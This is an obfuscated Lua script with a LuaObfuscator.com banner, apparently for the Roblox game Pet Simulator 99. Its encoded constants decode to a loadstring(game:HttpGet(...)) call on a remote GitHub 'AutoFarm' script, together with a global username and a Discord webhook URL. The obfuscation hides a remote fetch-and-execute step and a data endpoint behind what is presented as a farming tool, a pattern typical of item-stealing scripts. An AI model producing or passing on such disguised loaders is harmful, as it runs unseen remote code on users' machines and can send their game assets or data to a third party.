--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v30,16));if v19 then local v130=v5(v87,v19);v19=nil;return v130;else return v87;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-((1 + 0) -0)) -(v32-(2 -1))) + (620 -(555 + (91 -27))))) ;return v88-(v88%1) ;else local v89=931 -(857 + 74) ;local v90;while true do if (v89==(568 -((2004 -(1523 + 114)) + 201))) then v90=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v90 + v90))>=v90) and (1 + 0)) or ((1942 -(68 + 997)) -((1552 -(226 + 1044)) + 595)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (8 -6) );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(957 -((2189 -1297) + 65))) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -(2 + 0)) ;v37=1 -0 ;end if (1==v37) then return (v41 * (16777566 -(87 + 263))) + (v40 * (65716 -(67 + 113))) + (v39 * ((747 -559) + 68)) + v38 ;end end end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(952 -(802 + 150))) then v43=v23();v44=v23();v42=1 + 0 ;end if (v42==(7 -4)) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * 0 ;else v47=998 -(915 + 82) ;v45=0 -0 ;end elseif (v47==((1965 -(201 + 571)) + 854)) then return ((v46==(0 -0)) and (v48 * (((2326 -(116 + 1022)) -(1069 + 118))/0))) or (v48 * NaN) ;end return v8(v48,v47-(2320 -(5399 -4102)) ) * (v45 + (v46/((3 -1)^(10 + 42)))) ;end if (v42==(3 -1)) then v47=v20(v44,21 + 0 ,822 -(368 + 423) );v48=((v20(v44,100 -68 )==(19 -(10 + 8))) and  -(3 -(2 + 0))) or ((1617 -1174) -(416 + 26)) ;v42=9 -6 ;end if (v42==(1 + (0 -0))) then v45=1;v46=(v20(v44,1 -0 ,458 -(145 + 293) ) * (2^(462 -(44 + 386)))) + v43 ;v42=1488 -(998 + 488) ;end end end local function v25(v49) local v50=859 -(814 + 45) ;local v51;local v52;while true do if (v50==(1 + 1)) then v52={};for v115=2 -1 , #v51 do v52[v115]=v2(v1(v3(v51,v115,v115)));end v50=(3 -2) + (1749 -(760 + 987)) ;end if ((2 + 1)==v50) then return v6(v52);end if (v50==1) then v51=v3(v16,v18,(v18 + v49) -(886 -(261 + 624)) );v18=v18 + v49 ;v50=3 -1 ;end if (v50==(1080 -(1020 + 60))) then v51=nil;if  not v49 then local v121=1423 -(630 + 793) ;while true do if (v121==0) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=(1917 -(1789 + 124)) -3 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 1700 -(1419 + 281) ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if ( #":"~=v91) then else if (v92== #" ") then v93=(function() return v94()~=0 ;end)();elseif (v92==2) then v93=(function() return v95();end)();elseif (v92~= #"-19") then else v93=(function() return v96();end)();end v97[v98]=(function() return v93;end)();break;end if (v91==(0 -0)) then local v123=(function() return 0;end)();while true do if (v123~=(75 -(71 + 3))) then else v91=(function() return  #",";end)();break;end if (v123~=0) then else v92=(function() return v94();end)();v93=(function() return nil;end)();v123=(function() return 1;end)();end end end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v54=(function() return function(v99,v100,v101,v102,v103,v104,v105,v106,v107) local v108=(function() return 0 + 0 ;end)();local v99=(function() return;end)();local v100=(function() return;end)();while true do if (v108==0) then local v124=(function() return 0 -0 ;end)();local v125=(function() return;end)();while true do if (v124~=(0 -0)) then else v125=(function() return 241 -(187 + 54) ;end)();while true do if (v125==0) then v99=(function() return 0;end)();v100=(function() return nil;end)();v125=(function() return 1;end)();end if (v125~=(781 -(162 + 618))) then else v108=(function() return 1 + 0 ;end)();break;end end break;end end end if (v108==(1 + 0)) then local v126=(function() return 0 -0 ;end)();while true do if (v126==0) then local v131=(function() return 0;end)();while true do if (v131~=0) then else while true do if (v99==(0 -0)) then v100=(function() return v101();end)();if (v102(v100, #"\\", #"|")~=0) then else local v187=(function() return 0 + 0 ;end)();local v188=(function() return;end)();local v189=(function() return;end)();local v190=(function() return;end)();local v191=(function() return;end)();while true do if (v187==1) then local v196=(function() return 1636 -(1373 + 263) ;end)();while true do if (v196==(1000 -(451 + 549))) then v190=(function() return nil;end)();v191=(function() return nil;end)();v196=(function() return 1;end)();end if (v196==(1 + 0)) then v187=(function() return 2 -0 ;end)();break;end end end if (v187~=(2 -0)) then else while true do if (v188== #"]") then local v199=(function() return 0;end)();local v200=(function() return;end)();while true do if (v199==(1384 -(746 + 638))) then v200=(function() return 0;end)();while true do if (v200==0) then v191=(function() return {v103(),v103(),nil,nil};end)();if (v189==0) then local v207=(function() return 0 -0 ;end)();local v208=(function() return;end)();while true do if (v207==(341 -(218 + 123))) then v208=(function() return 0;end)();while true do if (0==v208) then v191[ #"-19"]=(function() return v103();end)();v191[ #"http"]=(function() return v103();end)();break;end end break;end end elseif (v189== #"[") then v191[ #"xnx"]=(function() return v104();end)();elseif (v189==2) then v191[ #"-19"]=(function() return v104() -(2^16) ;end)();elseif (v189== #"xxx") then local v215=(function() return 1581 -(1535 + 46) ;end)();local v216=(function() return;end)();while true do if (v215==(0 + 0)) then v216=(function() return 0 + 0 ;end)();while true do if (v216==0) then v191[ #"gha"]=(function() return v104() -((562 -(306 + 254))^(1 + 15)) ;end)();v191[ #"http"]=(function() return v103();end)();break;end end break;end end end v200=(function() return 1;end)();end if (v200==1) then v188=(function() return 2;end)();break;end end break;end end end if (v188==(3 -1)) then local v201=(function() return 1467 -(899 + 568) ;end)();local v202=(function() return;end)();while true do if (v201==0) then v202=(function() return 0 + 0 ;end)();while true do if (v202==(0 -0)) then if (v102(v190, #"<", #":")== #"]") then v191[2]=(function() return v105[v191[605 -(268 + 335) ]];end)();end if (v102(v190,2,292 -(60 + 230) )~= #"[") then else v191[ #"19("]=(function() return v105[v191[ #"19("]];end)();end v202=(function() return 573 -(426 + 146) ;end)();end if (v202==(1 + 0)) then v188=(function() return  #"xxx";end)();break;end end break;end end end if ((1456 -(282 + 1174))~=v188) then else local v203=(function() return 811 -(569 + 242) ;end)();local v204=(function() return;end)();while true do if (v203==0) then v204=(function() return 0 -0 ;end)();while true do if (v204==(0 + 0)) then v189=(function() return v102(v100,2, #"nil");end)();v190=(function() return v102(v100, #"0313",6);end)();v204=(function() return 1;end)();end if (v204~=(1025 -(706 + 318))) then else v188=(function() return  #">";end)();break;end end break;end end end if (v188~= #"asd") then else if (v102(v190, #"xxx", #"nil")== #"[") then v191[ #".dev"]=(function() return v105[v191[ #"0836"]];end)();end v106[v107]=(function() return v191;end)();break;end end break;end if (v187~=0) then else local v197=(function() return 1251 -(721 + 530) ;end)();local v198=(function() return;end)();while true do if (v197==(1271 -(945 + 326))) then v198=(function() return 0 -0 ;end)();while true do if (v198==(0 + 0)) then v188=(function() return 700 -(271 + 429) ;end)();v189=(function() return nil;end)();v198=(function() return 1;end)();end if (v198~=(1 + 0)) then else v187=(function() return 1501 -(1408 + 92) ;end)();break;end end break;end end end end end break;end end return v99,v100,v101,v102,v103,v104,v105,v106,v107;end end end end end end end;end)();local v55=(function() return function(v109,v110,v111) local v112=(function() return 1086 -(461 + 625) ;end)();while true do if (v112==(1288 -(993 + 295))) then local v127=(function() return 0 + 0 ;end)();while true do if (v127~=0) then else v109[v110-#"~" ]=(function() return v111();end)();return v109,v110,v111;end end end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v69= #"}",v60 do FlatIdent_5477B,Type,Cons,v21,v24,v25,v61,v69=(function() return v53(FlatIdent_5477B,Type,Cons,v21,v24,v25,v61,v69);end)();end v59[ #"-19"]=(function() return v21();end)();for v70= #":",v23() do FlatIdent_781F8,Descriptor,v21,v20,v22,v23,v61,v56,v70=(function() return v54(FlatIdent_781F8,Descriptor,v21,v20,v22,v23,v61,v56,v70);end)();end for v71= #" ",v23() do v57,v71,v28=(function() return v55(v57,v71,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1172 -(418 + 753) ];local v67=v63[1 + 1 ];local v68=v63[1 + 2 ];return function(...) local v72=v66;local v73=v67;local v74=v68;local v75=v27;local v76=1 + 0 ;local v77= -(1 + 0);local v78={};local v79={...};local v80=v12("#",...) -(1770 -(1749 + 20)) ;local v81={};local v82={};for v113=0 + 0 ,v80 do if ((2095<3686) and (v113>=v74)) then v78[v113-v74 ]=v79[v113 + (1323 -(1249 + 73)) ];else v82[v113]=v79[v113 + 1 + 0 ];end end local v83=(v80-v74) + (1146 -((1275 -809) + (911 -232))) ;local v84;local v85;while true do local v114=0 + 0 ;while true do if ((v114==(0 -0)) or (1595>=4474)) then v84=v72[v76];v85=v84[2 -(766 -(468 + 297)) ];v114=732 -(476 + 255) ;end if ((v114==((564 -(334 + 228)) -1)) or (4619<2882)) then if (v85<=(1905 -(106 + 1794))) then if (v85<=(2 + 0)) then if (v85<=(0 + 0)) then local v133=0 + 0 ;while true do if (v133==(239 -(64 + 174))) then v76=v76 + (2 -1) ;v84=v72[v76];v82[v84[5 -3 ]][v84[3]]=v84[118 -((13 -9) + 110) ];v76=v76 + (585 -(57 + 527)) ;v133=(3311 -1882) -(41 + 1386) ;end if ((v133==(105 -(17 + 86))) or (294>=4831)) then v84=v72[v76];v82[v84[2 + 0 ]]=v84[3];v76=v76 + (1 -0) ;v84=v72[v76];v133=8 -5 ;end if (v133==(169 -(122 + (79 -35)))) then v76=v84[1583 -(1183 + 397) ];break;end if (v133==(0 -0)) then v82[v84[6 -4 ]][v84[3]]=v84[4 + 0 + 0 ];v76=v76 + (237 -(141 + 95)) + 0 + 0 ;v84=v72[v76];v82[v84[(4 -2) + 0 ]]=v65[v84[5 -2 ]];v133=66 -(30 + 35) ;end end elseif (v85==(1 + 0)) then v82[v84[1259 -((2506 -1463) + 214) ]]();elseif (v82[v84[7 -5 ]]==v84[4]) then v76=v76 + ((285 + 928) -(323 + 889)) ;else v76=v84[7 -4 ];end elseif ((2029<=3084) and (v85<=(583 -(361 + 219)))) then v82[v84[322 -(53 + 267) ]]=v65[v84[3]];elseif (v85>(1 + (8 -5))) then local v137=v84[415 -(15 + 280 + 118) ];v82[v137]=v82[v137](v13(v82,v137 + (983 -(18 + 502 + 462)) ,v77));else v82[v84[7 -5 ]][v84[2 + 1 ]]=v84[3 + 1 ];end elseif ((v85<=((1208 -350) -(20 + 830))) or (2037==2420)) then if (v85<=(1131 -(936 + 189))) then do return;end elseif (v85==7) then local v141;local v142,v143;local v144;local v145;v82[v84[1 + 1 ]]=v65[v84[3 + 0 + 0 ]];v76=v76 + 1 ;v84=v72[v76];v145=v84[128 -(116 + 10) ];v144=v82[v84[1 + 2 ]];v82[v145 + (739 -(542 + 196)) ]=v144;v82[v145]=v144[v84[8 -4 ]];v76=v76 + 1 + 0 ;v84=v72[v76];v82[v84[2 + 0 ]]=v84[1878 -(157 + 1718) ];v76=v76 + 1 + 0 ;v84=v72[v76];v145=v84[(167 -(92 + 71)) -2 ];v142,v143=v75(v82[v145](v13(v82,v145 + 1 ,v84[7 -4 ])));v77=(v143 + v145) -(1552 -(1126 + 210 + 215)) ;v141=405 -(118 + 287) ;for v183=v145,v77 do v141=v141 + (3 -2) ;v82[v183]=v142[v141];end v76=v76 + (2 -1) ;v84=v72[v76];v145=v84[1 + 1 ];v82[v145]=v82[v145](v13(v82,v145 + (1 -0) ,v77));v76=v76 + (1122 -(118 + 1003)) ;v84=v72[v76];v82[v84[5 -(4 -1) ]]();v76=v76 + (378 -(142 + 235)) ;v84=v72[v76];v76=v84[3];else local v159=0 -0 ;local v160;local v161;local v162;local v163;while true do if (v159==(874 -(826 + 46))) then for v193=v160,v77 do v163=v163 + 1 ;v82[v193]=v161[v163];end break;end if (v159==(948 -(245 + 702))) then v77=(v162 + v160) -(3 -2) ;v163=0 + 0 ;v159=1 + 1 ;end if (v159==(977 -(553 + 424))) then v160=v84[442 -(382 + 58) ];v161,v162=v75(v82[v160](v13(v82,v160 + ((766 -(574 + 191)) -0) ,v84[9 -6 ])));v159=1 + 0 ;end end end elseif (v85<=(18 -9)) then v76=v84[8 -5 ];elseif (v85>(9 + 1)) then local v164=v84[2 + 0 ];local v165=v82[v84[2 + 1 + 0 ]];v82[v164 + (2 -1) + 0 ]=v165;v82[v164]=v165[v84[1694 -(1121 + 569) ]];else v82[v84[1 + 1 ]]=v84[2 + 0 + 1 ];end v76=v76 + (1464 -((2253 -(254 + 595)) + 59)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0B3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F7665737479782F50532Q392F6D61696E2F50657453696D756C61746F722Q394175746F4661726D2E6C756103023Q005F4703083Q00757365726E616D65030D3Q004772616E745F6A6F7264616E3503073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F31332Q30334Q342Q33382Q333230352Q372F385375544E2Q504F5658364759637433754B656D6C2Q582D4A556D50387549385F706F6E4864384C4443654C567256335A556C494846795F49344F77496864482D4F786700143Q00120A3Q00013Q0026023Q000B000100020004093Q000B0001001203000100033Q001207000200043Q00202Q00020002000500122Q000400066Q000200046Q00013Q00024Q00010001000100044Q001300010026023Q0001000100010004093Q00010001001203000100073Q00302Q00010008000900122Q000100073Q00302Q0001000A000B00124Q00023Q00044Q000100012Q00063Q00017Q00",v9(),...);
